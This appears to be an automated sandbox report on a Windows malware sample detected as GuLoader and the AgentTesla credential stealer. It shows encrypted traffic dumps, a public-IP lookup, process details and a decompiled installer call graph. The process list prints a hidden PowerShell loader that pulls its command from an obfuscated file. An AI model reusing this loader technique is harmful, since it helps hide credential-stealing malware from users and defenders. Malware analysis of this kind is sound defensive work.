                                                                        2024-04-05 12:29:32 UTC8000INData Raw: dc ab 1b 84 15 dc f5 8f 52 84 59 6a 66 7b e3 f6 03 a3 41 a6 97 1f a7 65 a4 f6 99 48 cc 66 cb 7d fb 73 bd 29 dc 0a 7c 43 ba 8f c2 06 b9 0f 1b 9a 6e 75 7d 00 b8 dd 4b 36 49 d3 46 d8 0f 57 78 a4 32 e7 9d 1f cd 6f 20 a8 f2 9d 79 01 20 54 13 4f 47 1b d4 5b a2 b7 e9 86 c8 b6 87 80 f4 34 7c 40 2a eb 85 62 76 0f b1 7b 41 79 a7 0e 23 97 0d 3b e3 99 ce da c1 5a 85 90 1c 13 be c6 96 bf 34 6b df 9b f3 2e d2 0e f7 a6 20 35 63 71 c0 a2 4a 14 cd 7d 00 bb 0c a3 f2 ca 79 8b b2 e0 db ff 1c 6c b4 f5 74 9d 05 b3 1e 35 46 f6 bc 42 c4 a2 a0 8b b5 40 e9 e8 42 4f e3 f2 dd c0 3f 38 97 5e 35 ac 62 a3 d1 3d 11 23 b3 2b ad f8 99 35 a9 02 80 2c 40 ba 1b c0 ad 9b 9a 17 fa 6e 3c ee 51 97 c2 bb c9 4e 72 ae c8 c0 11 36 09 29 54 5f 6f 11 42 ab cd 9c 6f 35 9d 42 d3 64 af c8 ab 5f fb 16 cc
                                                                        Data Ascii: RYjf{AeHf}s)|Cnu}K6IFWx2o y TOG[4|@*bv{Ay#;Z4k. 5cqJ}ylt5FB@BO?8^5b=#+5,@n<QNr6)T_oBo5Bd_
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: 4b 01 37 0b bf 62 63 ec 8f a8 e2 71 5e 96 8b 2c ea 80 b8 d5 9f be 60 75 0a ab 7e 48 3d 92 9c 04 d6 36 1e ca 5b ed 46 38 8f 81 f1 f9 7e 6b 3d 16 c5 b5 3a d8 42 75 5d 3f 9b c9 33 17 fe 00 2d 81 76 10 56 27 ab 86 79 5b 15 9b bd 48 8c e7 56 2c 61 7c 6b b5 aa 6f 6c c2 d3 29 17 7b be a9 3f 26 1c d6 15 ef dd c1 56 51 97 82 06 c4 f4 3b a2 a5 f8 2c b3 71 62 79 7f fc b0 2f 85 75 ac f3 f0 c4 dc 4d 3f d8 7b 38 e3 34 ae 56 03 34 33 3e d0 90 c3 8e 9f e3 93 2e 62 e0 9e e7 e4 30 af 02 3c 6f 45 1d 69 40 10 eb 2d 4b a5 24 86 c4 87 9f c8 7e 6a 3a 46 81 93 dd cd 29 a1 9b 89 02 0d 22 0e 03 7c d2 78 21 c3 d6 98 87 cf c8 d9 2f 8e 0b fc eb c6 f3 ef 98 5d af cc b9 ea 8f ff 6f 71 69 79 47 ca fe ea 98 3b 05 f2 70 81 36 0f 7c c4 4c be 5e f6 9c 35 39 9e 9f d7 31 5f a2 ae aa a6 6e e2
                                                                        Data Ascii: K7bcq^,`u~H=6[F8~k=:Bu]?3-vV'y[HV,a|kol){?&VQ;,qby/uM?{84V43>.b0<oEi@-K$~j:F)"|x!/]oqiyG;p6|L^591_n
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: fb a8 d7 e8 b7 9c f6 b5 18 59 25 45 92 13 d5 d9 f2 a7 6a ad 97 75 e4 07 f1 70 0c fc ea 5f 90 13 0e ad 18 e7 66 20 41 f1 41 1e 6e a4 4a 1e 04 6c 94 57 ad c9 f7 df ff 6c 67 4e d4 ac 1b 4d 79 83 25 fd f9 c7 66 36 09 4d 8f 26 23 5a 2d 20 e5 06 f9 3d e6 9d 39 f6 bd af 98 af 55 6d 26 b3 60 42 8b 08 5a 28 47 1c 79 80 a1 70 70 3c 97 fd 65 cd bb 5e bb bd 1c a2 48 6b a0 cb fe 9c 85 33 8b c2 1f 60 f6 ee 8a 90 10 f6 aa db 76 e8 df 97 cb f3 7a 58 3d bb d4 f4 ca a7 3c 07 ed 78 12 81 05 dd 72 fd 5b c8 0d 25 c3 12 d6 e5 82 bd 88 de 42 1d db 12 51 4b 8e 06 68 1b e7 2f c3 f1 b7 78 7c cd 91 89 c1 8e ba ba 73 18 56 60 ad 63 41 74 60 6f d5 ac fe 8f fd a2 0e b5 45 4b 29 c2 33 7f c5 89 2d 24 52 ef 90 68 6b c5 f9 1a a5 6f 13 f9 cb 75 72 4e 9f 2d 34 1c ee e2 a1 9c e5 c0 91 73 16
                                                                        Data Ascii: Y%Ejup_f AAnJlWlgNMy%f6M&#Z- =9Um&`BZ(Gypp<e^Hk3`vzX=<xr[%BQKh/x|sV`cAt`oEK)3-$RhkourN-4s
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: ef d7 ce 71 5a f4 b1 bc bd 56 e7 6c 28 02 1b ad 92 57 19 ba 20 e6 09 09 6d f7 0e fd e1 23 3e 52 4c 24 76 d3 13 d5 e4 76 e9 85 2a f0 7c b1 9f 31 79 97 0d d6 95 03 5b a5 40 c1 49 33 ff 2a 83 6d 34 42 6b 6b da 08 b7 d6 41 b0 e0 24 1e ef 75 27 68 e1 18 7a 4c 5e d0 c2 72 5f 3d 7b b9 13 c6 cc 98 86 0f 36 a4 d4 3b a9 f2 6f 4c 78 17 cd f8 01 67 24 e0 be d9 8b 7d 30 42 62 3c c1 0e ea e6 f3 4c 83 80 76 91 1e a9 28 1f 68 1b bc 80 9c 2a 7d c8 2d 40 ea e8 3e df 14 95 ee 75 87 c5 2a 65 59 47 81 8a e9 96 e2 98 85 64 c0 ee 71 02 83 d1 3e 2d c7 81 92 1a 96 be 56 c8 cc c8 6d 46 f1 57 a2 df 24 0d df 9a 0e 20 70 15 e2 df bb e9 1d a4 23 99 59 31 13 3a e9 4d ea 33 4b 01 18 6f d1 9f a1 4d b1 4e e9 d6 b4 9e d2 b3 ce 8a d9 86 d4 90 b6 13 f9 98 7a 5e 90 d2 b1 fe 9f 78 e6 48 9e 77
                                                                        Data Ascii: qZVl(W m#>RL$vv*|1y[@I3*m4BkkA$u'hzL^r_={6;oLxg$}0Bb<Lv(h*}-@>u*eYGdq>-VmFW$ p#Y1:M3KoMNz^xHw
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: 5a 69 e9 ff d5 d5 6d 94 12 0e 3b 5a b5 51 82 e5 f3 92 60 f5 5d 31 f5 4d 8d 7e a6 fa 8b 09 55 b3 70 57 15 64 5b 1b 1c cc 0c 9e 04 6c 6f 23 94 93 d8 3d 4d 85 3a 0b 3c 90 f7 85 f6 ab 16 ef ad f1 55 94 5f b7 f6 ea 76 76 aa a1 67 d0 a8 1b 3e 78 a6 f4 8f aa bd 0f 72 66 7b 1d 04 0c a2 2e e7 97 1f ad 17 36 a8 9b 38 d3 9d eb 7e f1 4a ea d7 d2 09 82 4f 47 83 e1 07 99 0a 1b 17 26 8b 7c 38 6c d3 42 36 49 d3 4e d8 0f 54 78 a4 32 ef b6 1f cd 65 43 58 fc 94 87 63 ea 54 61 22 66 1a a4 73 b5 2d 17 82 6e 96 7f 8c f0 34 aa 4a 2b eb 83 62 74 09 b1 a5 46 7b a7 f0 d4 96 34 d8 ef 9c ce 0c 7d 5b 85 b6 7a 6f bf c6 b0 41 38 6c df 93 ff 2c d2 08 0d 78 22 32 63 8f 32 ab 49 ea c1 85 0c 36 65 bc f3 35 86 74 b2 ed e0 e7 73 17 b5 0b 7e b4 73 93 10 3f 7c 2c ce b5 c5 5c dc 2b 95 af e0 e8
                                                                        Data Ascii: Zim;ZQ`]1M~UpWd[lo#=M:<U_vvg>xrf{.68~JOG&|8lB6INTx2eCXcTa"fs-n4J+btF{4}[zoA8l,x"2c2I6e5ts~s?|,\+
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: 2a c5 c3 17 e8 04 2f 54 a1 9d 14 7b ce f7 80 6f 65 fd 86 d3 64 28 89 9e 5f fa e9 3c 50 01 dd a3 06 3b e1 1c 15 64 a9 c0 79 cc e9 a9 66 c6 24 9d 49 68 a3 49 ae 34 e7 08 60 a7 6c 03 1c fc df e0 98 40 66 1a a3 b7 c9 ce 8c fd cc 4b 01 31 f5 4d 65 5a a2 11 a8 e2 85 8a 90 8b 57 8c a6 65 d1 e1 d6 60 8b 0c 8b 13 68 3c 98 a5 3b 8e c8 10 e2 59 13 4a 30 71 71 fd fe 7e 1b 58 29 7c 6b c5 27 bc 79 a3 3e 88 c3 33 17 ff 10 0d 80 76 10 3f d8 7d c7 7b 5d ea 97 bd 49 b7 d4 52 2c 28 83 6a 8c 94 6f 6c d3 cb 2c 17 7b be 6f 5e df e3 11 be e4 ed c3 56 d4 9b 84 06 e5 f5 3b b3 85 06 2d 8a 6d 9c 77 7f d4 8f 1f 85 7f de bd 12 c8 ac 22 2e d8 7b 32 1d c4 af 6f 29 36 33 3e d0 4e cc 88 9f e3 93 2c 64 e0 be 1b e8 30 af dc 3c 56 57 1d 97 41 5a 0c 2d 4b af e2 8d c5 87 bf f3 b4 95 c5 47 71
                                                                        Data Ascii: */T{oed(_<P;dyf$IhI4`l@fK1MeZWe`h<;YJ0qq~X)|k'y>3v?}{]IR,(jol,{o^V;-mw".{2o)63>N,d0<VWAZ-KGq
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: 4e 54 3c f8 7a 5d 1c 0f 5d d5 4c be 5c 08 d6 39 15 ee 61 d1 3d 5f 82 ad a9 96 6d 1c 92 ee 23 04 9d fc a4 87 3c 89 4e c0 63 0c 51 95 86 bd 70 3c 5a 75 54 58 ce 7c fd 7a 23 d5 7a e1 f5 2e c6 86 4b aa 1a 14 75 10 37 06 25 a7 19 fa a8 f7 ed b5 9c f6 4b c1 60 20 45 58 13 ed dc 50 a6 6a 95 ca 8a 1b f8 db 70 0c ef da 5d 90 d1 a5 ad 18 e6 52 21 50 d1 9e 1f 6e a4 b2 10 04 6c ad f9 ad c8 f7 df 01 60 25 4e f4 ad de 4c 79 7d 23 c6 e5 c7 60 36 f7 44 8e 26 58 27 36 10 e4 26 76 3e e6 9d 13 77 bd be b2 8f 57 6d 26 4d 90 41 8b 30 94 d6 4b 1c 79 5e ae 7d 70 1c 6b fc 5c da 45 5f 82 62 15 a2 48 39 a8 cf fe ec 85 57 8b c2 13 32 9e f1 8a e0 c6 e4 aa db 7c e8 dd 96 cb f3 7b 58 3d bb d4 fb fe b0 3c f9 e1 8b 1b a1 04 a6 0e fd a5 cd 5b 42 c3 12 dc b6 0c bd 88 d4 42 1d db 12 71 b7
                                                                        Data Ascii: NT<z]]L\9a=_m#<NcQp<ZuTX|z#z.Ku7%K` EXPjp]R!Pnl`%NLy}#`6D&X'6&v>wWm&MA0Ky^}pk\E_bH9W2|{X=<[BBq
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: d7 dd 96 bc 78 d3 1a af 4c 0e fa cb d7 48 05 9f 2c 34 e2 f3 c1 a1 62 e9 c8 6f 83 1a 63 f2 54 63 c0 79 17 fc 28 f3 01 9c 71 00 1c c7 c3 89 a7 41 37 e8 89 6f a9 36 3d 25 e8 2b f6 56 16 3d 58 c7 09 52 8e 62 23 cb f2 ec cc 2c 7f ee ee e4 ec a4 f8 56 b0 d2 06 19 65 22 3a 1a ac 92 57 e7 9e a6 e6 f7 03 0f 78 61 39 eb 03 30 26 79 24 88 dc 60 de ce 88 95 fa 39 d1 7d bb f0 4e 87 96 3e ab eb 02 5b d0 33 cd 43 39 ff 2d 83 6d 3c bf 6b 6b dc 99 c1 d6 41 b6 e0 24 1f ef ab 29 62 e1 77 1a 4d 67 fa 1f 74 5f c3 77 9f ce 38 c5 98 86 f2 27 a4 d4 3b 7f 70 67 4c 47 71 42 f8 01 93 08 eb be b6 a3 83 3e 49 be c2 33 16 eb c6 d2 4c 83 80 2e 91 11 84 22 e1 64 0f bc 5e 91 39 7d 46 ba 71 39 14 c1 de e6 98 fc 55 a3 c4 2a 65 a7 1e 46 81 fb 96 1c ac 92 64 3e e2 58 47 f2 47 fe b6 37 7e 6d
                                                                        Data Ascii: xLH,4bocTcy(qA7o6=%+V=XRb#,Ve":Wxa90&y$`9}N>[3C9-m<kkA$)bwMgt_w8';pgLGqB>I3L."d^9}Fq9U*eFd>XGG7~m
                                                                        2024-04-05 12:29:32 UTC8000INData Raw: d2 d7 b4 94 c0 24 31 75 2c 29 2c 9f b6 63 2f 89 7d 5e 64 ec 19 fe 9f 69 b0 9f 9e 77 c5 bd 69 bd c0 1e 92 1f ab a5 6c 7f fa e0 32 28 11 6e 74 f9 48 48 59 76 83 f3 ae 95 2b 78 09 fe 3d 33 f7 82 f2 31 0d c2 54 09 22 25 4a b4 be 89 7a e9 01 d9 28 60 fd 73 f0 2d 40 c7 9d 8c 8a ab fd 39 ff 81 c5 c0 73 8d 54 a6 04 c6 3f 55 4d 7e 54 15 44 6f 1a 1c cc 83 d7 04 6c 59 df 9a 9b c8 c3 41 8d 3a 2b 3c 90 f5 85 d6 96 e9 ef ad 6c d1 99 57 b7 e0 20 76 76 b0 81 66 d0 a8 1b a4 17 c7 c5 8a ac 69 61 72 66 2c e3 08 1e 82 41 86 97 1f 59 6b d3 bd a3 9c bd c4 eb 7e 05 7f b8 d7 f2 0c 7c 43 44 7d c0 3f 97 0a 1b 9a 56 91 7c 39 92 fd 4d 36 b7 df b9 d6 2a 54 78 5a 3e ca 8b 3f ca 65 de a6 0e 9c be b6 22 54 61 08 46 1b a4 73 4b b9 ea 8c 52 fd 81 80 f4 ca 8e 4f 29 15 89 9f 7a f2 bd 5b 4a
                                                                        Data Ascii: $1u,),c/}^diwil2(ntHHYv+x=31T"%Jz(`s-@9sT?UM~TDolYA:+<lW vvfiarf,AYk~|CD}?V|9M6*TxZ>?e"TaFsKRO)z[J


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449737104.26.12.2054437456C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-04-05 12:29:34 UTC155OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                        Host: api.ipify.org
                                                                        Connection: Keep-Alive
                                                                        2024-04-05 12:29:35 UTC211INHTTP/1.1 200 OK
                                                                        Date: Fri, 05 Apr 2024 12:29:35 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 15
                                                                        Connection: close
                                                                        Vary: Origin
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 86f98b6718ef748d-MIA
                                                                        2024-04-05 12:29:35 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31
                                                                        Data Ascii: 102.129.152.231


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:14:28:53
                                                                        Start date:05/04/2024
                                                                        Path:C:\Users\user\Desktop\hnTW5HdWvY.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\hnTW5HdWvY.exe"
                                                                        Imagebase:0x400000
                                                                        File size:541'940 bytes
                                                                        MD5 hash:D32A9F003D7D44F7839D1E73AB0880DC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:14:28:56
                                                                        Start date:05/04/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
                                                                        Imagebase:0x870000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2018427169.0000000008E2F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:14:28:56
                                                                        Start date:05/04/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:14:28:57
                                                                        Start date:05/04/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                                        Imagebase:0x240000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:14:29:20
                                                                        Start date:05/04/2024
                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                        Imagebase:0xf30000
                                                                        File size:516'608 bytes
                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:27.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:26.2%
                                                                          Total number of Nodes:1357
                                                                          Total number of Limit Nodes:51
                                                                          execution_graph 2981 10001000 2984 100010d3 2981->2984 3063 10001096 GetModuleHandleA GetProcAddress 2984->3063 2987 10001107 GetModuleFileNameA GlobalAlloc 2990 1000114a 2987->2990 2988 1000123e GlobalAlloc 2989 10001257 2988->2989 2991 1000126f FindWindowExA FindWindowExA 2989->2991 3004 1000128e 2989->3004 2992 10001169 2990->2992 2993 1000114f CharPrevA 2990->2993 2991->3004 2995 10001173 2992->2995 2996 10001189 GetTempFileNameA CopyFileA 2992->2996 2993->2990 2993->2992 3076 10001a05 2995->3076 2998 100011b7 CreateFileA CreateFileMappingA MapViewOfFile 2996->2998 2999 1000121c lstrcatA lstrlenA 2996->2999 3002 10001210 CloseHandle CloseHandle 2998->3002 3003 100011ea UnmapViewOfFile 2998->3003 2999->2989 3002->2999 3003->3002 3006 100012b4 lstrcmpiA 3004->3006 3066 100019c5 3004->3066 3071 100017fc lstrlenA 3004->3071 3005 1000102b 3006->3004 3007 100012cf 3006->3007 3008 100012d3 3007->3008 3009 100012fe 3007->3009 3010 10001a05 2 API calls 3008->3010 3011 100013a8 GetVersionExA 3009->3011 3013 100012f6 3009->3013 3014 1000138a GlobalAlloc 3009->3014 3012 100012dd 3010->3012 3015 100013e0 3011->3015 3016 100013be InitializeSecurityDescriptor SetSecurityDescriptorDacl 3011->3016 3012->3013 3022 100012ed DeleteFileA 3012->3022 3013->3009 3013->3014 3018 10001461 lstrcpyA 3014->3018 3019 1000139e GlobalLock 3014->3019 3017 100013e3 CreatePipe 3015->3017 3016->3017 3017->3018 3020 10001403 CreatePipe 3017->3020 3021 100016a9 3018->3021 3019->3011 3020->3018 3024 10001416 GetStartupInfoA CreateProcessA 3020->3024 3023 100016af 3021->3023 3027 100016b7 3021->3027 3022->3013 3025 10001a05 2 API calls 3023->3025 3024->3018 3026 10001478 GetTickCount 3024->3026 3025->3027 3029 10001481 3026->3029 3028 100016cf 3027->3028 3030 100016c4 3027->3030 3031 100016d8 lstrcpyA 3028->3031 3032 100016ea 3028->3032 3029->3021 3033 10001494 PeekNamedPipe 3029->3033 3042 10001659 Sleep 3029->3042 3043 1000162b GetTickCount 3029->3043 3034 10001776 5 API calls 3030->3034 3031->3032 3035 100016f2 wsprintfA 3032->3035 3036 1000170a 3032->3036 3033->3029 3038 100014ae GetTickCount ReadFile 3033->3038 3037 100016cd 3034->3037 3035->3036 3039 10001a05 2 API calls 3036->3039 3037->3028 3040 10001661 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 3038->3040 3041 100014dd lstrlenA 3038->3041 3044 10001716 6 API calls 3039->3044 3040->3029 3045 1000150c lstrlenA GlobalSize 3041->3045 3046 100014ee lstrlenA lstrcpynA 3041->3046 3042->3040 3043->3042 3047 1000163a TerminateProcess lstrcpyA 3043->3047 3048 10001742 3044->3048 3051 10001556 lstrcatA 3045->3051 3052 10001526 GlobalUnlock GlobalReAlloc 3045->3052 3046->3040 3047->3040 3049 10001753 GlobalFree 3048->3049 3050 1000174a DeleteFileA 3048->3050 3049->3005 3053 10001763 GlobalUnlock GlobalFree 3049->3053 3050->3049 3062 1000157f 3051->3062 3054 10001694 lstrcpyA 3052->3054 3055 1000154c GlobalLock 3052->3055 3053->3005 3054->3021 3055->3051 3056 100017fc 4 API calls 3056->3062 3057 1000156a GlobalSize 3058 10001585 lstrlenA 3057->3058 3057->3062 3059 100015a1 lstrcpyA 3058->3059 3058->3062 3059->3062 3060 100015ff CharNextA 3060->3062 3062->3040 3062->3056 3062->3057 3062->3059 3062->3060 3079 10001776 3062->3079 3064 100010b8 GetCurrentProcess 3063->3064 3065 100010c5 3063->3065 3064->3065 3065->2987 3065->2988 3067 100019fe 3066->3067 3068 100019cf 3066->3068 3067->3004 3068->3067 3069 100019dc lstrcpyA 3068->3069 3070 100019ef GlobalFree 3068->3070 3069->3070 3070->3067 3072 1000183d lstrlenA 3071->3072 3073 10001845 3072->3073 3074 10001816 lstrcmpiA 3072->3074 3073->3004 3074->3073 3075 10001834 CharNextA 3074->3075 3075->3072 3077 1000117d GlobalFree 3076->3077 3078 10001a0e GlobalAlloc lstrcpynA 3076->3078 3077->3005 3078->3077 3080 10001795 3079->3080 3081 100017f8 3079->3081 3082 100017ae SendMessageA SendMessageA SendMessageA 3080->3082 3083 1000179e lstrlenA OemToCharBuffA 3080->3083 3081->3062 3082->3081 3083->3082 3996 4019c0 3997 4029ff 18 API calls 3996->3997 3998 4019c7 3997->3998 3999 4029ff 18 API calls 3998->3999 4000 4019d0 3999->4000 4001 4019d7 lstrcmpiA 4000->4001 4002 4019e9 lstrcmpA 4000->4002 4003 4019dd 4001->4003 4002->4003 4004 4035c1 4005 4035cc 4004->4005 4006 4035d0 4005->4006 4007 4035d3 GlobalAlloc 4005->4007 4007->4006 3136 4022c2 3137 4022f2 3136->3137 3138 4022c7 3136->3138 3140 4029ff 18 API calls 3137->3140 3148 402b09 3138->3148 3142 4022f9 3140->3142 3141 4022ce 3143 4022d8 3141->3143 3147 40230f 3141->3147 3152 402a3f RegOpenKeyExA 3142->3152 3144 4029ff 18 API calls 3143->3144 3146 4022df RegDeleteValueA RegCloseKey 3144->3146 3146->3147 3149 4029ff 18 API calls 3148->3149 3150 402b22 3149->3150 3151 402b30 RegOpenKeyExA 3150->3151 3151->3141 3153 402ad3 3152->3153 3160 402a6a 3152->3160 3153->3147 3154 402a90 RegEnumKeyA 3155 402aa2 RegCloseKey 3154->3155 3154->3160 3163 405ea5 GetModuleHandleA 3155->3163 3156 402ac7 RegCloseKey 3162 402ab6 3156->3162 3158 402a3f 3 API calls 3158->3160 3160->3154 3160->3155 3160->3156 3160->3158 3161 402ae2 RegDeleteKeyA 3161->3162 3162->3153 3164 405ec1 LoadLibraryA 3163->3164 3165 405ecc GetProcAddress 3163->3165 3164->3165 3166 402ab2 3164->3166 3165->3166 3166->3161 3166->3162 4008 402b44 4009 402b53 SetTimer 4008->4009 4010 402b6c 4008->4010 4009->4010 4011 402bc1 4010->4011 4012 402b86 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4010->4012 4012->4011 3167 402647 3168 4029ff 18 API calls 3167->3168 3169 40264e FindFirstFileA 3168->3169 3170 402671 3169->3170 3173 402661 3169->3173 3175 405ad8 wsprintfA 3170->3175 3172 402678 3176 405b7a lstrcpynA 3172->3176 3175->3172 3176->3173 3177 4014ca 3180 404e65 3177->3180 3181 4014d1 3180->3181 3182 404e80 3180->3182 3183 404e9d lstrlenA 3182->3183 3184 405b9c 18 API calls 3182->3184 3185 404ec6 3183->3185 3186 404eab lstrlenA 3183->3186 3184->3183 3188 404ed9 3185->3188 3189 404ecc SetWindowTextA 3185->3189 3186->3181 3187 404ebd lstrcatA 3186->3187 3187->3185 3188->3181 3190 404edf SendMessageA SendMessageA SendMessageA 3188->3190 3189->3188 3190->3181 3191 4023ca 3192 402b09 19 API calls 3191->3192 3193 4023d4 3192->3193 3194 4029ff 18 API calls 3193->3194 3195 4023dd 3194->3195 3196 4023e7 RegQueryValueExA 3195->3196 3201 402665 3195->3201 3197 40240d RegCloseKey 3196->3197 3198 402407 3196->3198 3197->3201 3198->3197 3202 405ad8 wsprintfA 3198->3202 3202->3197 3203 4030cb #17 SetErrorMode OleInitialize 3204 405ea5 3 API calls 3203->3204 3205 403110 SHGetFileInfoA 3204->3205 3276 405b7a lstrcpynA 3205->3276 3207 40313b GetCommandLineA 3277 405b7a lstrcpynA 3207->3277 3209 40314d GetModuleHandleA 3210 403164 3209->3210 3211 405635 CharNextA 3210->3211 3212 403178 CharNextA 3211->3212 3214 403188 3212->3214 3213 403252 3215 403265 GetTempPathA 3213->3215 3214->3213 3220 405635 CharNextA 3214->3220 3224 403254 3214->3224 3278 403097 3215->3278 3217 40327d 3218 403281 GetWindowsDirectoryA lstrcatA 3217->3218 3219 4032d7 DeleteFileA 3217->3219 3221 403097 11 API calls 3218->3221 3286 402c2b GetTickCount GetModuleFileNameA 3219->3286 3220->3214 3223 40329d 3221->3223 3223->3219 3226 4032a1 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3223->3226 3368 405b7a lstrcpynA 3224->3368 3225 4032eb 3227 403381 3225->3227 3230 403371 3225->3230 3234 405635 CharNextA 3225->3234 3229 403097 11 API calls 3226->3229 3385 403529 3227->3385 3232 4032cf 3229->3232 3314 403603 3230->3314 3232->3219 3232->3227 3236 403306 3234->3236 3242 4033b0 lstrcatA lstrcmpiA 3236->3242 3243 40334c 3236->3243 3237 40339a 3392 40538e 3237->3392 3238 40348e 3240 403511 ExitProcess 3238->3240 3244 405ea5 3 API calls 3238->3244 3242->3227 3247 4033cc CreateDirectoryA SetCurrentDirectoryA 3242->3247 3369 4056f8 3243->3369 3248 40349d 3244->3248 3250 4033e3 3247->3250 3251 4033ee 3247->3251 3252 405ea5 3 API calls 3248->3252 3396 405b7a lstrcpynA 3250->3396 3397 405b7a lstrcpynA 3251->3397 3255 4034a6 3252->3255 3257 405ea5 3 API calls 3255->3257 3258 4034af 3257->3258 3260 4034fd ExitWindowsEx 3258->3260 3265 4034bd GetCurrentProcess 3258->3265 3259 403366 3384 405b7a lstrcpynA 3259->3384 3260->3240 3263 40350a 3260->3263 3262 405b9c 18 API calls 3264 40342d DeleteFileA 3262->3264 3406 40140b 3263->3406 3267 40343a CopyFileA 3264->3267 3273 4033fc 3264->3273 3269 4034cd 3265->3269 3267->3273 3268 403482 3270 405a2e 40 API calls 3268->3270 3269->3260 3270->3227 3272 405b9c 18 API calls 3272->3273 3273->3262 3273->3268 3273->3272 3275 40346e CloseHandle 3273->3275 3398 405a2e 3273->3398 3403 40532d CreateProcessA 3273->3403 3275->3273 3276->3207 3277->3209 3279 405de5 5 API calls 3278->3279 3281 4030a3 3279->3281 3280 4030ad 3280->3217 3281->3280 3409 40560a lstrlenA CharPrevA 3281->3409 3416 40580b GetFileAttributesA CreateFileA 3286->3416 3288 402c6b 3308 402c7b 3288->3308 3417 405b7a lstrcpynA 3288->3417 3290 402c91 3418 405651 lstrlenA 3290->3418 3294 402ca2 GetFileSize 3295 402d9e 3294->3295 3306 402cb9 3294->3306 3423 402bc7 3295->3423 3297 402da7 3299 402dd7 GlobalAlloc 3297->3299 3297->3308 3460 403080 SetFilePointer 3297->3460 3434 403080 SetFilePointer 3299->3434 3300 402e0a 3304 402bc7 6 API calls 3300->3304 3303 402df2 3435 402e64 3303->3435 3304->3308 3305 402dc0 3309 40306a ReadFile 3305->3309 3306->3295 3306->3300 3306->3308 3310 402bc7 6 API calls 3306->3310 3457 40306a 3306->3457 3308->3225 3311 402dcb 3309->3311 3310->3306 3311->3299 3311->3308 3312 402dfe 3312->3308 3312->3312 3313 402e3b SetFilePointer 3312->3313 3313->3308 3315 405ea5 3 API calls 3314->3315 3316 403617 3315->3316 3317 40361d 3316->3317 3318 40362f 3316->3318 3484 405ad8 wsprintfA 3317->3484 3319 405a61 3 API calls 3318->3319 3320 40365a 3319->3320 3322 403678 lstrcatA 3320->3322 3324 405a61 3 API calls 3320->3324 3323 40362d 3322->3323 3468 4038c8 